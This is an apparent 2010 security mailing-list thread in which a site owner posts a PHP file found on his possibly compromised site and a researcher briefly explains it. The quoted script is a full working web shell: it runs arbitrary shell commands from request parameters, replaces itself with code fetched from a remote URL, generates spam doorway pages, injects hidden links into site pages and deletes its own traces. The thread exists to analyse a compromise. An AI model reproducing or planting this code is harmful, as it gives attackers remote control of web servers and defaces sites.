Re: [Pauldotcom] Odd PHP file, trying to find out what it does

David Hoelzer Mon, 01 Mar 2010 08:58:22 -0800

Never seen this one but you're right if that's any consolation. ;)

Parts are allowing files to be created, parts are executing commands, parts are 
cleaning up tracks, etc.


On Mar 1, 2010, at 1:16 AM, Adrian Crenshaw wrote:

> Ok, I think one of my sites may have been compromised. I found the following 
> PHP script on a site, but I'm not sure what it is trying to do. Anyone else 
> ever seen this script before?
> 
> Adrian
> 
> <?php
> ignore_user_abort(1);
> set_time_limit(0);
> 
> function Clear()
> {
>     unlink("c");
>     unlink("1r");
>   unlink("log");
> }
> 
> function Clear2()
> {
>     $mrd = trim(file_get_contents("m"));
>     $pt = "../$mrd";
>     $fin = file_get_contents($pt);
>     $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin);
>   $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
>     $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); 
>     $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
>     $fin = ereg_replace("<!--dd4-->", "", $fin);
>   $fin = ereg_replace("<!--dd5-->", "", $fin);
>   $fin = ereg_replace("<font style=\"position: absolute;overflow: 
> hidden;height: 0;width: 0\">", "", $fin);
>     $fmrd = fopen($pt, "w+");
>     fwrite($fmrd, $fin);
>     fclose($fmrd);
>     echo " upt-ok";
> }
> 
> function GetVar($name, &$var)
> {
>     $var = "";
>     if (isset($_POST[$name]))
>         $var = $_POST[$name];
> 
>   if (isset($_GET[$name]))
>         $var = $_GET[$name];
>     
>     if (($var) =="")
>       return  false;
>       else return true;
> }
> 
> function Gen()
> {
>     $alp = "abcdefghiklmnjsweqrtyuiopzx";
>     $maps = array();
>     if (isset($_POST["sg"]))
>         $sg = $_POST["sg"];
> 
>   if (isset($_GET["sg"]))
>         $sg = $_GET["sg"]; 
>         
>     if (isset($_POST["gm"]))
>       $g = $_POST["gm"];
> 
>     if (isset($_GET["gm"]))
>         $g = $_GET["gm"];
>         
>         
>     $path = "";
>     $fr = fopen("1r", "a+");
>     if (file_exists("c"))
>     {
>         $fconf = file("c");
>         $tname = trim($fconf[0]);
>         $cname = trim($fconf[1]);
>         $curs = trim($fconf[2]);
>         $pid = trim($fconf[3]);
>         if ($pid == 100)
>         {
>             $pid = 0;
>             $rnd = mt_rand(0, 999);
>             $nm = "";
>         for ($i=0; $i<3; $i++)
>           {
>               $ran = mt_rand(0,26);
>               $sym = $alp[$ran];
>               $nm = $nm.$sym;
>           }
>             $cname = $nm;
>             mkdir("$tname/$cname");
>             $curs = $g;
>         }
>     }
>     else 
>     {
>         $rnd = mt_rand(0, 999);
>         $nm = "";
>       for ($i=0; $i<5; $i++)
>         {
>             $ran = mt_rand(0,26);
>             $sym = $alp[$ran];
>             $nm = $nm.$sym;
>         }
>         $tname = $nm;
>         $pid = 0;
>         $curs = $g;
>         mkdir($tname);
>         $fht = fopen("$tname/.htaccess", "w+");
>         $htname = $sg."2.txt";
>         $fp = fopen($htname, "r");
>         $fin = '';
>         while (!feof($fp))
>         {
>              $fc = fgets($fp, 1024);
>              if (!$fc) break;
>            $fin .= $fc;
>         }
>         fclose($fp);
>         fwrite($fht, $fin);
>         fclose($fht);
>         $rnd = mt_rand(0, 999);
>         $nm = "";
>     for ($i=0; $i<3; $i++)
>       {
>           $ran = mt_rand(0,26);
>           $sym = $alp[$ran];
>           $nm = $nm.$sym;
>       }
>         $cname = $nm;
>     mkdir("$tname/$cname");
>     }
>   $gname = $sg."sgen.php";
>     for ($j=$pid; $j<$pid+10; $j++)
>     {
>         $fp = fopen($gname."?g=$curs", "r");
>         $fin = '';
>         while (!feof($fp))
>         {
>              $fc = fgets($fp, 1024);
>              if (!$fc) break;
>            $fin .= $fc;
>         }
>         fclose($fp);
>         
>         $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
>         fwrite($fnd, $fin);
>         fclose($fnd);
>     }
>     
>     if ($j==100)
>     {
>       $fp = fopen($gname."?g=$curs&m=1", "r");
>         $fin = '';
>         while (!feof($fp))
>         {
>              $fc = fgets($fp, 1024);
>              if (!$fc) break;
>            $fin .= $fc;
>         }
>         fclose($fp);
>         $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
>         fwrite($fnd, $fin);
>         fclose($fnd);
>         $map = "$path/$tname/$cname/$curs"."_lm.htm";
>         fwrite($fr,"$map\n");
>     }
>     
>     $fconf = fopen("c", "w+");
>     fwrite($fconf, $tname."\n");
>     fwrite($fconf, $cname."\n");
>     fwrite($fconf, $curs."\n");
>     $nj = $j;
>     fwrite($fconf, $nj."\n");
>     fclose($fconf);
> }
> 
> function Update()
> {
>     $thisname = "1.php";
>     if (isset($_POST['u']))
>       $u = $_POST['u'];
>       
>     if (isset($_GET['u']))
>          $u = $_GET['u'];
>          
>      $fp = fopen($u, "r");
>   $fin = '';
>         while (!feof($fp))
>         {
>              $fc = fgets($fp, 1024);
>              if (!$fc) break;
>            $fin .= $fc;
>         }
>   fclose($fp);
>   
>   $fthis = fopen($thisname, "w+");
>   fwrite($fthis, $fin);
>   fclose($fthis);
> }
> 
> function Com()
> {
>     if (isset($_POST['c']))
>       @system($_POST['c']);
>   if (isset($_GET['c']))
>         @system($_GET['c']);
> }
> 
> function UpKos()
> {
>     $mrd = trim(file_get_contents("m"));
>     $pt = "../$mrd";
>     $fin = file_get_contents($pt);
>     $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin);
>     $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin);
>     $fmrd = fopen($pt, "w+");
>     fwrite($fmrd, $fin);
>     fclose($fmrd);
> }
> 
> 
> function MRepl()
> {
>     $mpt = "";
>     $drs = "";
>     $begtag = "<adsttnmq1><font style=\"position: absolute;overflow: 
> hidden;height: 0;width: 0\">"; 
>   $endtag = "</font></body></html><sdioyslkjs2> "; 
>     $mrd = trim(file_get_contents("m"));
>     $pt = "../$mrd";
>     $fin = file_get_contents($pt);
>     GetVar("mpt", $mpt);
>      // óäàëÿåì çàâåðøàþùèå õòìë òåãè
>   $fin = preg_replace ("/<\/body>/i", "", $fin);
>   $fin = preg_replace ("/<\/html>/i", "", $fin);
>   $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
>   $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin);
>     $fp = fopen($mpt, "r");
>   GetVar("drs", $drs);
>   $fin = $fin.$begtag;  
> $drs = str_replace("\\", "", $drs);
>   $fin = $fin.$drs;
>   $fin = $fin.$endtag; 
>   $fmrd = fopen($pt, "w+");
>     fwrite($fmrd, $fin);
>     fclose($fmrd);
> }
> 
> function Main()
> {
>     if (isset($_POST['u']) || isset($_GET['u']))
>     {
>         Update();
>         exit();
>     }
>     
>     if (isset($_POST['c']) || isset($_GET['c']))
>     {
>         Com();
>         exit();
>     }
>     
>         if (isset($_POST['uk']) || isset($_GET['uk']))
>     {
>         UpKos();
>         exit();
>     }
>     
>     if (isset($_POST['g']) || isset($_GET['g']))
>     {
>         Gen();
>         exit();
>     }
>     
>     if (isset($_POST['s']) || isset($_GET['s']))
>     {
>         MRepl();
>         exit();
>     }
>     
>   if (isset($_POST['cl']) || isset($_GET['cl']))
>     {
>         Clear();
>         exit();
>     }
>     
>     if (isset($_POST['cl2']) || isset($_GET['cl2']))
>     {
>         Clear2();
>         exit();
>     }
>     
>     echo "<ok>";
>     
> }
> 
> Main();
> 
> ?>
> _______________________________________________
> Pauldotcom mailing list
> [email protected]
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com


---------------------------------------------------------
David Hoelzer
Director of Research, Enclave Forensics
[email protected]

_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

Re: [Pauldotcom] Odd PHP file, trying to find out what it does

Reply via email to